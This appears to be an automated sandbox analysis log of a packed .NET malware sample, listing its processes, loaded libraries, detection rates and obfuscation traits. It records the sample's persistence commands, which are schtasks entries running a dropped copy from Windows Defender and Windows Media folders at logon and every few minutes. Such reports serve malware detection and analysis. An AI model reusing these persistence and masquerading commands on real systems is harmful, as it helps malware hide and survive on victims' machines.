Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat"
Source: QT4aLb3P98.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: QT4aLb3P98.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: QT4aLb3P98.exe ReversingLabs: Detection: 84%
Source: QT4aLb3P98.exe Virustotal: Detection: 68%
Source: C:\Users\user\Desktop\QT4aLb3P98.exe File read: C:\Users\user\Desktop\QT4aLb3P98.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\QT4aLb3P98.exe "C:\Users\user\Desktop\QT4aLb3P98.exe"
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe'" /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqk" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 6 /tr "'C:\Windows\Media\Sonata\wRRcPdViqk.exe'" /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqk" /sc ONLOGON /tr "'C:\Windows\Media\Sonata\wRRcPdViqk.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "wRRcPdViqkw" /sc MINUTE /mo 11 /tr "'C:\Windows\Media\Sonata\wRRcPdViqk.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown Process created: C:\Windows\Media\Sonata\wRRcPdViqk.exe C:\Windows\Media\Sonata\wRRcPdViqk.exe
Source: unknown Process created: C:\Windows\Media\Sonata\wRRcPdViqk.exe C:\Windows\Media\Sonata\wRRcPdViqk.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Media\Sonata\wRRcPdViqk.exe "C:\Windows\Media\Sonata\wRRcPdViqk.exe"
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\eE9QbXcUOX.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\Media\Sonata\wRRcPdViqk.exe "C:\Windows\Media\Sonata\wRRcPdViqk.exe" Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: ntdsapi.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\w32tm.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Directory created: C:\Program Files\Windows Defender\en-GB\wRRcPdViqk.exe Jump to behavior
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Directory created: C:\Program Files\Windows Defender\en-GB\62cf92e5da7ec3 Jump to behavior
Source: QT4aLb3P98.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: QT4aLb3P98.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: QT4aLb3P98.exe Static file information: File size 1170944 > 1048576
Source: QT4aLb3P98.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x11a400
Source: QT4aLb3P98.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: QT4aLb3P98.exe, vAvRw3K4pP2OrHcG5JZ.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
.NET source code contains potential unpacker
Source: QT4aLb3P98.exe, ni3nO9Z0bNMZMdyGDZt.cs .Net Code: qYNuj0iD7A System.AppDomain.Load(byte[])
Source: QT4aLb3P98.exe, ni3nO9Z0bNMZMdyGDZt.cs .Net Code: qYNuj0iD7A System.Reflection.Assembly.Load(byte[])
Source: QT4aLb3P98.exe, ni3nO9Z0bNMZMdyGDZt.cs .Net Code: qYNuj0iD7A
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B882BF8 pushad ; retf 0_2_00007FFD9B882C61
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B882C38 pushad ; retf 0_2_00007FFD9B882C61
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B882C58 pushad ; retf 0_2_00007FFD9B882C61
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B882C48 pushad ; retf 0_2_00007FFD9B882C61
Source: C:\Users\user\Desktop\QT4aLb3P98.exe Code function: 0_2_00007FFD9B88DED8 pushfd ; retf 0_2_00007FFD9B88DED9
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 10_2_00007FFD9B8B2BF8 pushad ; retf 10_2_00007FFD9B8B2C61
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 10_2_00007FFD9B8B2C38 pushad ; retf 10_2_00007FFD9B8B2C61
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 10_2_00007FFD9B8B2C58 pushad ; retf 10_2_00007FFD9B8B2C61
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 10_2_00007FFD9B8B2C48 pushad ; retf 10_2_00007FFD9B8B2C61
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 10_2_00007FFD9B8BDED8 pushfd ; retf 10_2_00007FFD9B8BDED9
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B88DED8 pushfd ; retf 11_2_00007FFD9B88DED9
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B8A6060 push ebx; retn 000Fh 11_2_00007FFD9B8A64AA
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B8A64CD push ebx; retn 000Fh 11_2_00007FFD9B8A64AA
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 11_2_00007FFD9B882BE4 pushad ; retf 11_2_00007FFD9B882C61
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 12_2_00007FFD9B8BDED8 pushfd ; retf 12_2_00007FFD9B8BDED9
Source: C:\Windows\Media\Sonata\wRRcPdViqk.exe Code function: 12_2_00007FFD9B8B2BE4 pushad ; retf 12_2_00007FFD9B8B2C61
Source: QT4aLb3P98.exe Static PE information: section name: .text entropy: 6.880883233546267
Source: wRRcPdViqk.exe.0.dr Static PE information: section name: .text entropy: 6.880883233546267
Source: wRRcPdViqk.exe0.0.dr Static PE information: section name: .text entropy: 6.880883233546267
Source: QT4aLb3P98.exe, JiKg8d856ZjYXmiBYFo.cs High entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'SwirFUDDty', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
Source: QT4aLb3P98.exe, w3475uuXHT35IaRI8Bu.cs High entropy of concatenated method names: 'R7E0qElHL3', 'ltf0OTpAca', 'UY1x80ByerrkSXqqZFE', 'yY0VUHB4NjScUJl9yke', 'zfPFaeBZsrtXtMlxiZv', 'Df9vawBrnViwCtIPRoF', 'jqpLBuBxw3jUF3BBGgm', 'JxsPH7BgMGa4aeDZs1B'
Source: QT4aLb3P98.exe, JIJKCDNsoUDMgsolyUG.cs High entropy of concatenated method names: 'F6LNTnKW5b', 'EbYebccaAvWCeMGmvkc', 'XPCvR0cFN8xYDhKGnmh', 'iBSuulcowVrlmXv4Wmu', 'u5dO5acmvKB2GesbLvx', 'lXg7ZCcOP1708CPovCp', 'SHqPFic1VvsblYS6DZV', 'G9mwHKchBTCpTr1MiWa', 'Qf6NnIMXY0', 'vKV1Zec5qmnjESYUbcK'
Source: QT4aLb3P98.exe, hctUYkuV0iFJ1dPM067.cs High entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'AHFuswBC7JI9bQC8Hb3', 'IVbojOBb50tB27FgGsg', 'C71ahJBkJA4Sa2KH54L', 'MdBNtfBS751QJJ6sKWn'
Source: QT4aLb3P98.exe, SbFE8PN0xa9wA4CIVcp.cs High entropy of concatenated method names: '_3fO', 'YZ8', '_48A', 'G9C', 'G4BjrVqqIuiUrQTMLHP', 'nZ5mZHqRF1J810eGQfx', 'GOci69q5XgwQU5WZ1uP', 'OUiwyrqcVEPMIrqQOlb', 'IEgBorqJTEBKBZSstEc', 'qsp177qjyyi0mCXy4gt'
Source: QT4aLb3P98.exe, HjgiARybfruwpinHKq.cs High entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'XAAvUJDPE', 'NIa45Ca48CQerTx7N8X', 'AiavwmaxHv26R8OKBIF', 'naMuBUags9MmMq4KnG6', 'JLNCndatqAp2fjWc0Fq', 'VYSkpnaBnWYYbDJwVLg'
Source: QT4aLb3P98.exe, aYHCPhZ2Uteq2rb4lxv.cs High entropy of concatenated method names: 'exbtkwtG6L', 'VE4tc1QZot', 'KGBtzD5Fke', 'oyC8J2Bmrs', 'ft98NOFWHc', 'NfL8ZEYgBs', 'Rdj8uAQfX5', 'MS38t98a7m', 'IdQ888DTLj', 'auXM09SvKFWEOONbevW'
Source: QT4aLb3P98.exe, eaVHe48uTpqvepbPin2.cs High entropy of concatenated method names: 'YsY2PGKB7NlHCEsv8A0', 'UYd7TMKNu5CHhKIMUP0', 'h6EId6KgKviqG3aR6xm', 'iUj3BpKtyFhFjLItSPM', 'PVuMX6vFYJ', 'MlAZU1K0T6mAPeg2sWU', 'J6M2eFKfrcnmUgBhjj9', 'kW8wGAKEVI4eGb5UsTf', 'r7xAbMKnNJ4dApYh6k3', 'NM37oLKMlIXH0kYJoEC'
Source: QT4aLb3P98.exe, c1dZrVYZZmXaCgA8tdW.cs High entropy of concatenated method names: 'D0IAU3uo8W', 'fBSA0iLCHn', '_8r1', 'ROyA3RiFmK', 'RamAorlOOK', 'o9OAxuHAOW', 'BwaAmKnksn', 'AuvOgCHSVFqMS0Lmm2p', 'LxEoTDHZ11xsCNjl5Cg', 'uxQ6P3HrefskYwBEvQ4'
Source: QT4aLb3P98.exe, cIhUhU87xqoiS8aIYjc.cs High entropy of concatenated method names: 'ESnrtupts9', 'J2rr8wqf7x', 'tDZrY3oZ5U', 'CknrKOiUNG', 'LJirUlRH0F', 'dCBr0xFCQZ', 'ksXr34A2sJ', 'Qd3ro3xJg5', 'cRlrxuq8BE', 'JRdrmTR76k'
Source: QT4aLb3P98.exe, xlMfjjSlwWE9ZS9iFb.cs High entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'zNLaO0OTT1F35TSI7MR', 'HbiapbOlMTG40aCihLe', 'Jf8vApO3PAKb1m5t7yo', 'f8Kja6OQRnKn4F1Mvse', 'yd2T92OY2DwaaDeOdlN', 'FWLOuNOuPWLHJ0cW4w7'
Source: QT4aLb3P98.exe, Qmn44TubyfFJgaNL5o4.cs High entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'q833o8IJJ6', 'eBmeY2LXm0', 'tCa3xAVYYG', 'JhZeasOJ6j', 'gQ3SZRNLl8obTFayyPk', 'kVGQygNACh7MShXhVbx', 'Ellj2MN6CE9Xt3pc9XG'
Source: QT4aLb3P98.exe, wACN0CtwSQcZB5NcoXm.cs High entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'ILGjlfSsWj', 'gpjjPb8lqt', 'r8j', 'LS1', '_55S'
Source: QT4aLb3P98.exe, PK7kftNRm6sY0anTonR.cs High entropy of concatenated method names: '_2WU', 'YZ8', '_743', 'G9C', 'RP0gA9JhmKLU0l7h8FZ', 'Metfq6Jqa9mr5N9DCHq', 'tSQ0yTJRL8gIBUlWY7O', 'n7BtnxJ5ha5N9lpE7Nu', 'ONoL61JODWwhfgkpyh4', 'BvRc4gJ1yBEsAXPmQhW'
Source: QT4aLb3P98.exe, DHbEZIdqePPmX1u5OH.cs High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'e2oj2hF6gEVNvT9l6H4', 'lj7IawFDkiYRKDRlMTr', 'Br8rcZFLvKMu70urn7W', 'BAX2GoFAeSfxuWB4kXx', 'kDjyXSFHXsfIMawrSit', 'l6pDxVFpbqV3JnBDxmZ'
Source: QT4aLb3P98.exe, TPLV12KsWsYNV0yEvc.cs High entropy of concatenated method names: 'GV142sWsY', 'VvjKt7KvHN6ZwZZCyg', 'f3YXs5dSjyIM1N0hdX', 'g3oHmrwoOpDtfa41jy', 'MZyRYKGtwsGCYyB3DP', 'oOfBX9VgvFysdw0vuD', 'txRZhWtsU', 'WoAuTJMAI', 'IQEtMG9GI', 'pch8Apg3T'
Source: QT4aLb3P98.exe, IvZRi0uWrrwg1ss7Eej.cs High entropy of concatenated method names: 'HEHU9bKEg2', 'MFZUCj7eOb', 'j2NU7ot0Et', 'qPOUfUGhru', 'jCKU5RBIwy', 'xKNvcithiiegC6GhgLL', 'AHgp6rtq42Im1Hbg3Wa', 'sMIaWBtOedUeBSwmfWO', 'CyEghpt1VRyOr0nESe3', 'q7X3BZtRWyBYOXRJKn8'
Source: QT4aLb3P98.exe, hPlDc6ter0qURk0qvlE.cs High entropy of concatenated method names: 'kEgmOfeimH', 'sSKmLKd8pv', 'LIfmgT23yD', 'KxPmaQgugU', 'BLhmdIXaGy', 'tID95Z0VUfXxSLGpXNY', 'F4Egmi06BqBHlwWgylV', 'gpjKvi0K49pIWclsABd', 'osv8g80Gr14fii6cgHr', 'Fke1O10D8vmgZEEJvZa'
Source: QT4aLb3P98.exe, XrrMhMtogEHbKEg2iFZ.cs High entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
Source: QT4aLb3P98.exe, ekZ8mjNbGSW36MJaG8q.cs High entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'GxvLlIJw4xY94CI5AMP', 'lKidG9JKQnIhG6jiqqy', 'NE42s7JGToxvB2hF5xw', 'tWHpG8JVRidcPW7Djv3', 'K7K50LJ6AlLi2vAMN8E', 'Lqiyf7JDc39FgnXvq1Z'
Source: QT4aLb3P98.exe, bgb94uut44YRypTwclP.cs High entropy of concatenated method names: 'JRVKQ0SjD5', 'ICwKiNdLXI', 'KMqKRcFbPw', 'O4TKTTr5SI', 'kGQKSlOAlQ', 'aP1KnrtS3c', 'pFht6j4sn6jSD4P2Nsy', 'EDGHhL4fHnDOnvE62rt', 't7SHNP4Mn40F4k7twRL', 'zXd8XV488k5fDDZLa7G'
